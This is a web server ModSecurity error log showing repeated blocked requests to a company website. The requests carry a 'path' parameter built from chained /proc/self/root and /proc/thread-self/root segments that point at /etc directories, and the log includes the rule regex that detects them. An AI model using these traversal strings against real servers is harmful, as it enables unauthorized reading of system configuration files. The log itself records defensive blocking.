[Mon Mar 16 09:07:57.262760 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.243.203:47890] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfynf9ocpUE4ed4uDzXNQAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:07:57.614948 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.244.31:35720] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfyndSswJuvopo3lOhKNwAAAI4"]
[Mon Mar 16 09:08:15.503210 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.241.46:51266] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfyrwlT9VtDQc7bgUyUDgAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:08:31.522788 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.241.46:49002] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfyvtSswJuvopo3lOhKTwAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 09:08:36.183551 2026] [:error] [pid 32654:tid 140411658000128] [client 74.7.241.46:58208] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfyxAlT9VtDQc7bgUyUMQAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:08:42.339450 2026] [:error] [pid 21946:tid 140411632822016] [client 74.7.241.46:58218] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfyynbQATo66fKoS7w2RAAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:08:54.203412 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.243.203:47896] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfy1njZBu2q05ozVU9ARQAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:11:01.057920 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.241.46:42588] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfzVY6lpbStxTqkSktY5gAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:11:10.639361 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.241.46:41148] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfzXrysWC90G-1nBrAv_gAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:11:34.079078 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.241.46:58686] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfzdrysWC90G-1nBrAwGwAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:11:49.640301 2026] [:error] [pid 32654:tid 140411674785536] [client 74.7.243.203:58976] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfzhQlT9VtDQc7bgUyVeAAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:11:54.887179 2026] [:error] [pid 21946:tid 140411557287680] [client 74.7.243.203:45396] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfzinbQATo66fKoS7w2gAAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:11:55.711100 2026] [:error] [pid 11972:tid 140411666392832] [client 74.7.241.46:53750] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfzi5qj1wV0Si-OkefTFQAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:12:03.541001 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.241.46:55442] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfzk9SswJuvopo3lOhKmQAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:12:07.171204 2026] [:error] [pid 10709:tid 140411574073088] [client 74.7.241.46:40698] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfzlxXjF1vJNtV6CWrjqwAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:12:37.159187 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.243.203:45410] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfztbABkC4fWIHEf8HVcgAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:12:39.180558 2026] [:error] [pid 10709:tid 140411725141760] [client 74.7.241.46:59284] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfztxXjF1vJNtV6CWrj0AAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:12:39.534930 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:45074] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfzt5qj1wV0Si-OkefTKAAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:12:52.000728 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.243.203:58888] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfzwo6lpbStxTqkSktZHgAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:12:58.659869 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.244.31:48636] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfzyrABkC4fWIHEf8HVfgAAAFA"]
[Mon Mar 16 09:12:59.875344 2026] [:error] [pid 10709:tid 140411674785536] [client 74.7.243.203:52396] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfzyxXjF1vJNtV6CWrj2gAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:13:06.088043 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.241.46:49316] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfz0XjZBu2q05ozVU9AqgAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:13:24.855582 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.241.46:36768] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfz5LABkC4fWIHEf8HVnwAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Mon Mar 16 09:13:40.443973 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.241.46:33734] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfz9Jqj1wV0Si-OkefTUgAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
